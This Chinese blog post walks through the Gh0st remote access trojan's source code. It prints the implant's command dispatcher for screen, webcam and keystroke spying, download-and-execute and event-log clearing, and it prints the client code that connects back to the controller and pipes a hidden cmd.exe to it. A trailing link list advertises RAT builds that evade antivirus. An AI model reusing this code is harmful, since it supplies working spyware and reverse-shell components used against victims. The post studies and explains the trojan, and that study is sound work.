Ghost之远程终端管理

最新推荐文章于 2025-06-09 16:23:39 发布
原创 最新推荐文章于 2025-06-09 16:23:39 发布 · 置顶 · 2.2k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

主要分析,客户端连接上主控端后,主控端主动要求进行终端管理后的一系列实现过程。

一、主控端发起远控申请指令COMMAND_SHELL

1、点击“终端管理”按钮后,主控端获取要进行远控的客户端(这里我习惯称为客户端,也有人称被控端为服务端)连接上来的套接字,然后向该客户端发送指令COMMAND_SHELL

二、客户端对收到的远控申请处理

1、客户端的工作线程WorkThread收到主控端的数据,调用OnRead进行对接收的数据解析,大约包括检测数据头“GHOST”、数据完整性检测和解压数据包,然后调用OnReceive函数(如下),根据数据的消息头进行相应的操作。

m_pManager->OnReceive(m_DeCompressionBuffer.GetBuffer(0), m_DeCompressionBuffer.GetBufferLen());

2、跟进m_pManager的OnReceive后,发现CManager的OnReceive函数,并没有进行实现。
以下是CManager中对于OnReceive的函数声明,可以看出该方法为一个虚函数,肯定是有类对该方法进行了重写。

virtual void OnReceive(LPBYTE lpBuffer, UINT nSize);

3、回头想下m_pManager的赋值是在哪呢?
在MainDll中,有以下两句代码对m_pManager进行赋值,而CKernelManager继承于CManager,同时对OnReceive进行了重写。

CKernelManager  manager(&socketClient, strServiceName, g_dwServiceType, strKillEvent, lpszHost, dwPort);
socketClient.setManagerCallBack(&manager);

CKernelManager中对于OnReceive方法的重写源码如下:

void CKernelManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
{
    switch (lpBuffer[0])
    {
    case COMMAND_ACTIVED:
        InterlockedExchange((LONG *)&m_bIsActived, true);
        break;
    case COMMAND_LIST_DRIVE: // 文件管理
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_FileManager, 
            (LPVOID)m_pClient->m_Socket, 0, NULL, false);
        break;
    case COMMAND_SCREEN_SPY: // 屏幕查看
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ScreenManager,
            (LPVOID)m_pClient->m_Socket, 0, NULL, true);
        break;
    case COMMAND_WEBCAM: // 摄像头
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_VideoManager,
            (LPVOID)m_pClient->m_Socket, 0, NULL);
        break;
    case COMMAND_AUDIO: // 摄像头
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_AudioManager,
            (LPVOID)m_pClient->m_Socket, 0, NULL);
        break;
    case COMMAND_SHELL: // 远程sehll
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ShellManager, 
            (LPVOID)m_pClient->m_Socket, 0, NULL, true);
        break;
    case COMMAND_KEYBOARD: 
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_KeyboardManager,
            (LPVOID)m_pClient->m_Socket, 0, NULL);
        break;
    case COMMAND_SYSTEM: 
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SystemManager,
            (LPVOID)m_pClient->m_Socket, 0, NULL);
        break;

    case COMMAND_DOWN_EXEC: // 下载者
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_DownManager,
            (LPVOID)(lpBuffer + 1), 0, NULL, true);
        Sleep(100); // 传递参数用
        break;
    case COMMAND_OPEN_URL_SHOW: // 显示打开网页
        OpenURL((LPCTSTR)(lpBuffer + 1), SW_SHOWNORMAL);
        break;
    case COMMAND_OPEN_URL_HIDE: // 隐藏打开网页
        OpenURL((LPCTSTR)(lpBuffer + 1), SW_HIDE);
        break;
    case COMMAND_REMOVE: // 卸载,
        UnInstallService();
        break;
    case COMMAND_CLEAN_EVENT: // 清除日志
        CleanEvent();
        break;
    case COMMAND_SESSION:
        CSystemManager::ShutdownWindows(lpBuffer[1]);
        break;
    case COMMAND_RENAME_REMARK: // 改备注
        SetHostID(m_strServiceName, (LPCTSTR)(lpBuffer + 1));
        break;
    case COMMAND_UPDATE_SERVER: // 更新服务端
        if (UpdateServer((char *)lpBuffer + 1))
            UnInstallService();
        break;
    case COMMAND_REPLAY_HEARTBEAT: // 回复心跳包
        break;
    }   
}

4、接下来便是根据指令COMMAND_SHELL调用Loop_ShellManager线程,并将套接字作为线程参数传入。

DWORD WINAPI Loop_ShellManager(SOCKET sRemote)
{
    CClientSocket   socketClient;
    if (!socketClient.Connect(CKernelManager::m_strMasterHost, CKernelManager::m_nMasterPort))
        return -1;

    CShellManager   manager(&socketClient);

    socketClient.run_event_loop();

    return 0;
}

其实这里可以发现,我们传入的套接字并没有使用到。而是新创建了一个套接字,专门用于进行一系列的远程终端的数据收发操作。
其中的CShellManager类主要就是进行远程终端管理的相关操作实现,该类的构造函数实现了相关的管道初始化和线程的创建。

CShellManager::CShellManager(CClientSocket *pClient):CManager(pClient)
{
    SECURITY_ATTRIBUTES  sa = {0};    
    STARTUPINFO          si = {0};
    PROCESS_INFORMATION  pi = {0}; 
    char  strShellPath[MAX_PATH] = {0};

    m_hReadPipeHandle   = NULL;
    m_hWritePipeHandle  = NULL;
    m_hReadPipeShell    = NULL;
    m_hWritePipeShell   = NULL;
    sa.nLength = sizeof(sa);
    sa.lpSecurityDescriptor = NULL; 
    sa.bInheritHandle = TRUE;

    //这里创建管道了  
    if(!CreatePipe(&m_hReadPipeHandle, &m_hWritePipeShell, &sa, 0))
    {
        if(m_hReadPipeHandle != NULL)   CloseHandle(m_hReadPipeHandle);
        if(m_hWritePipeShell != NULL)   CloseHandle(m_hWritePipeShell);
        return;
    }

    if(!CreatePipe(&m_hReadPipeShell, &m_hWritePipeHandle, &sa, 0)) 
    {
        if(m_hWritePipeHandle != NULL)  CloseHandle(m_hWritePipeHandle);
        if(m_hReadPipeShell != NULL)    CloseHandle(m_hReadPipeShell);
        return;
    }

    memset((void *)&si, 0, sizeof(si));
    memset((void *)&pi, 0, sizeof(pi));

    GetStartupInfo(&si);
    si.cb = sizeof(STARTUPINFO);
    si.wShowWindow = SW_HIDE;
    si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
    si.hStdInput  = m_hReadPipeShell;                           //将管道赋值
    si.hStdOutput = si.hStdError = m_hWritePipeShell; 

    GetSystemDirectory(strShellPath, MAX_PATH);
    strcat(strShellPath,"\\cmd.exe");
    //创建cmd进出  并指定管道
    if (!CreateProcess(strShellPath, NULL, NULL, NULL, TRUE, 
        NORMAL_PRIORITY_CLASS, NULL, NULL, &si, &pi)) 
    {
        CloseHandle(m_hReadPipeHandle);
        CloseHandle(m_hWritePipeHandle);
        CloseHandle(m_hReadPipeShell);
        CloseHandle(m_hWritePipeShell);
        return;
    }
    m_hProcessHandle = pi.hProcess;
    m_hThreadHandle = pi.hThread;

    //通知主控端 一切准备就绪
    BYTE    bToken = TOKEN_SHELL_START;       
    Send((LPBYTE)&bToken, 1);
    WaitForDialogOpen();
    //然后创建一个读取管道数据的 线程 
    m_hThreadRead = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ReadPipeThread, (LPVOID)this, 0, NULL);
    //再创建一个等待的线程  等待管道关闭 也就是用户关闭终端管理
    m_hThreadMonitor = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)MonitorThread, (LPVOID)this, 0, NULL);
}

这里会发送一个指令TOKEN_SHELL_START,用于通知主控端这里已经准备就绪。

三、主控端收到客户端准备就绪指令TOKEN_SHELL_START

1、同样是解压数据包,然后调用主窗体类中的ProcessReceiveComplete方法,对接收到的数据包根据数据头进行相应处理

case TOKEN_SHELL_START:
    g_pPCRemoteDlg->PostMessage(WM_OPENSHELLDIALOG, 0, (LPARAM)pContext);
    break;

2、WM_OPENSHELLDIALOG是自定义的一个消息,主窗体收到该消息后:

ClientContext   *pContext = (ClientContext *)lParam;
//这里定义远程终端的对话框
CShellDlg   *dlg = new CShellDlg(this, m_iocpServer, pContext);

dlg->Create(IDD_SHELL, GetDesktopWindow());
dlg->ShowWindow(SW_SHOW);

pContext->m_Dialog[0] = SHELL_DLG;
pContext->m_Dialog[1] = (int)dlg;

主控端打开自己实现的用于远程终端控制的CShellDlg,该Dlg中实现了相关的远程终端操作。
窗体打开后,主控端会发送指令COMMAND_NEXT,客户端在WaitForDialogOpen()中收到该指令后,创建ReadPipeThread线程,用于对于远程终端操作的客户端实现(管道)。

四、主控端与客户端的交互

接下来便是,主控端与客户端的交互。客户端根据主控端的Shell指令进行相应的操作。
1、主控端对客户端数据到来的处理流程
最先是IOCP模型收到数据包,然后进行分发给主控端的消息处理,主控端将完整收到的数据包后调用ProcessReceiveComplete进行消息分发,在ProcessReceiveComplete中判断该套接字是否与窗口关联(部分源码如下),然后判断该窗口是否为远程终端管理窗口

if (pContext->m_Dialog[0] > 0)
{
    switch (pContext->m_Dialog[0])
    {
    ...
    case SHELL_DLG:
        ((CShellDlg *)dlg)->OnReceiveComplete();
        break;
    ...
    }
}

然后调用CShellDlg中的OnReceiveComplete,进行将收到的数据显示出来的功能,这样就完成了对客户端发来的数据进行的处理。

void CShellDlg::OnReceiveComplete(void)
{
    AddKeyBoardData();
    m_nReceiveLength = m_edit.GetWindowTextLength();
}

2、主控端对客户端发送Shell指令流程
解析出写的Shell指令后,直接通过套接字发送即可

BOOL CShellDlg::PreTranslateMessage(MSG* pMsg)
{
    //如果是键盘按下
    if (pMsg->message == WM_KEYDOWN)
    {
        // 屏蔽VK_ESCAPE、VK_DELETE
        if (pMsg->wParam == VK_ESCAPE || pMsg->wParam == VK_DELETE)
            return true;
        //如果是可编辑框的回车键
        if (pMsg->wParam == VK_RETURN && pMsg->hwnd == m_edit.m_hWnd)
        {
            //得到窗口的数据大小
            int len = m_edit.GetWindowTextLength();
            CString str;
            //得到窗口的字符数据
            m_edit.GetWindowText(str);
            //加入换行符
            str += "\r\n";

            m_iocpServer->Send(m_pContext, (LPBYTE)str.GetBuffer(0) + m_nCurSel, str.GetLength() - m_nCurSel);
            m_nCurSel = m_edit.GetWindowTextLength();
        }
        // 限制VK_BACK
        if (pMsg->wParam == VK_BACK && pMsg->hwnd == m_edit.m_hWnd)
        {
            if (m_edit.GetWindowTextLength() <= m_nReceiveLength)
                return true;
        }
    }
    // Ctrl没按下
    if (pMsg->message == WM_CHAR && GetKeyState(VK_CONTROL) >= 0)
    {
        int len = m_edit.GetWindowTextLength();
        m_edit.SetSel(len, len);
        // 用户删除了部分内容,改变m_nCurSel
        if (len < m_nCurSel)
            m_nCurSel = len;
    }

    return CDialog::PreTranslateMessage(pMsg);
}

3、客户端对主控端发来的Shell指令的处理流程
客户端收到主控端的数据后,调用OnReceive函数,将主控端发送来的数据写入到cmd的输入管道中

void CShellManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
{
    if (nSize == 1 && lpBuffer[0] == COMMAND_NEXT)      //判断是否为通知主控端对话框打开
    {
        NotifyDialogIsOpen();
        return;
    }

    unsigned long   ByteWrite;
    WriteFile(m_hWritePipeHandle, lpBuffer, nSize, &ByteWrite, NULL);
}

数据写入到输入管道中后,ReadPipeThread线程读取到管道数据,然后发送给主控端。

DWORD WINAPI CShellManager::ReadPipeThread(LPVOID lparam)
{
    unsigned long   BytesRead = 0;
    char    ReadBuff[1024];
    DWORD   TotalBytesAvail;
    CShellManager *pThis = (CShellManager *)lparam;
    while (1)
    {
        Sleep(100);
        while (PeekNamedPipe(pThis->m_hReadPipeHandle, ReadBuff, sizeof(ReadBuff), &BytesRead, &TotalBytesAvail, NULL)) 
        {
            //如果没有数据就跳出本本次循环
            if (BytesRead <= 0)
                break;
            memset(ReadBuff, 0, sizeof(ReadBuff));
            LPBYTE lpBuffer = (LPBYTE)LocalAlloc(LPTR, TotalBytesAvail);
            //读取管道数据
            ReadFile(pThis->m_hReadPipeHandle, lpBuffer, TotalBytesAvail, &BytesRead, NULL);
            // 发送数据
            pThis->Send(lpBuffer, BytesRead);
            LocalFree(lpBuffer);
        }
    }
    return 0;
}

致敬Ghost作者。

远程控制Ghost
03-08
远程源码,无后门,请放心下载,这款软件相信玩远程的不用我过多的解释了吧
GhOst_RAT_beta_v3.6_VIP远控源码带验证.rar
05-06
RAT通过网络连接将受害者电脑变为攻击者的远程控制终端,通常利用社会工程学手段进行传播,比如伪装成合法软件或诱使用户点击含有恶意代码的链接。一旦安装在目标系统上,RAT会隐蔽运行,避开反病毒软件的检测,为...
远程终端管理和检测系统
Dotnet9的专栏
03-29 584
TerminalMACS(Terminal Manager And Check System) 远程终端管理和检测系统 本文同步更新地址:https://dotnet9.com/11429.html 一、本系统可监控多种终端资源: 移动端 Android iOS PC端 Windows Linux Mac 二、整个系统分为三类进程: 被控端(Client) 被控端用于获取终端数据,如...
Ghost远控2010:全面掌握远程控制技术
最新发布
weixin_30653091的博客
06-09 779
远程控制技术是信息时代的一项关键技术,它允许用户通过网络在不同地点的计算机之间传递控制信息,从而实现对远程计算机的管理与维护。本章首先对远程控制的基本概念进行阐述,然后探讨其在现代IT运维中的重要性和应用。远程控制技术基于网络通信原理,通过特定的软件或协议,实现用户在本地计算机上对远程计算机进行操作。它为IT管理员提供了极大的便捷,无论身处何地,都能够及时响应和解决计算机故障,优化资源配置,提高工作效率。
ghost3.75远控_2020免杀远控_免杀远控_ghost远程控制_免杀_Ghost远控_
09-29
此远控已经编译好,包免杀,要的自行下载,谢谢
远程终端管理
yuanbin715的专栏
08-20 473
【实验条件】建立一个Windows2000的网络,其中有一台域控制器win2000s-01.nserver-01.com,一台Win2000Professional用作工作站(win2000p-01.nserver-01.com),一台Windows98工作站(win98-01.nserver-01.com)。【实验说明】将一台工作站,作为Windows2000Server的远程终端,使其能进行所
探索神秘的 Ghost:一款强大的远程访问工具(RAT)
gitblog_00041的博客
05-18 1418
探索神秘的 Ghost:一款强大的远程访问工具(RAT) 项目地址:https://gitcode.com/gh_mirrors/ghos/ghost 在信息安全的世界中,有一种名为Ghost的独特存在,它是一款轻量级的远程访问木马(RAT),能为服务器或攻击者提供对目标电脑的全面控制。通过Ghost,攻击者可以在受害者无感知的情况下执行命令,并可以静默下载和运行文件,这种隐秘的操作方式使得恶意...
ghOst3.78远控王
03-26
远程终端 一个简单shell 系统管理 进程管理,窗口管理 视频监控 监控远程摄像头 会话管理 注销,重启,关机,卸载服务端 其它功能 下载执行指定URL中的程序,隐藏或者显示访问指定网址 地址位置 将IP数据库文件QQWry...
XP远程桌面修复补丁
09-26
然而,一些用户在安装了精简版或者Ghost版本的XP系统后,可能会遇到远程桌面无法正常使用的问题。"XP远程桌面修复补丁"正是为了解决这类问题而设计的。 远程桌面服务(Remote Desktop Services,简称RDS),在XP...
深入探索GHOST 1.0开源远控代码
这类工具的目的是允许用户从一个终端设备远程操作和访问另一个终端设备,这在IT支持和系统管理中是常见的应用。了解该工具的具体实现,有助于学习者掌握远程控制软件的设计理念和技术细节。 ### 压缩包子文件的文件...
XP系统无法远程桌面连接解决办法
06-17
远程桌面连接是 Windows 系统中的一种常用的远程管理工具,它允许管理员从远程地点管理服务器和特殊角色的员工计算机。然而,在某些情况下,管理员可能会遇到无法连接到远程桌面的问题,例如笔者在管理一台 XP 系统...
凡窝GHOST远控(原饭客论坛专用远控)
05-13
凡窝GHOST远控(原饭客论坛专用远控)
远程终端管理系统
10-28
利用socket网络编程技术,基于linux系统tcp/ip协议完成的一个带有网络聊天功能的小程序,界面用gtk完成。
Ghost3.6远控软件
10-02
一款很好的远控软件ghost 3.6稳定
ghost远控非常的好用
01-19
ghost远控非常的好用
ghost3.6 远控。
05-13
ghost3.6 远控 重启上线,免杀自做、
ghost原装正版远控源码(毫无修改)
08-08
ghost原装正版远控 毫无作假 远程控制源代码 打造个人版本远程控制软件
远程控制)Ghost3.6.rar
09-21
远程控制)Ghost3.6.rar(非灰鸽子)(非灰鸽子)(非灰鸽子)(非灰鸽子)(非灰鸽子)(非灰鸽子)(非灰鸽子)(非灰鸽子)(非灰鸽子)(非灰鸽子)(非灰鸽子)(非灰鸽子)(非灰鸽子)(非灰鸽子)(非灰鸽子)
ghost远程还原系统
weixin_34240520的博客
03-24 624
所需软件:onekey UltraISO 系统镜像:windows2003sp2.iso 1.下载windows2003sp2.iso 2.下载UltraISO,安装注册好.打开软件,文件--打开系统镜像文件,提取windows2003sp2.GHO到非系统盘 3.下载onekey最新版,打开软件安装选项打钩.点确定后,在系统启动项会添加onekey ghost...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值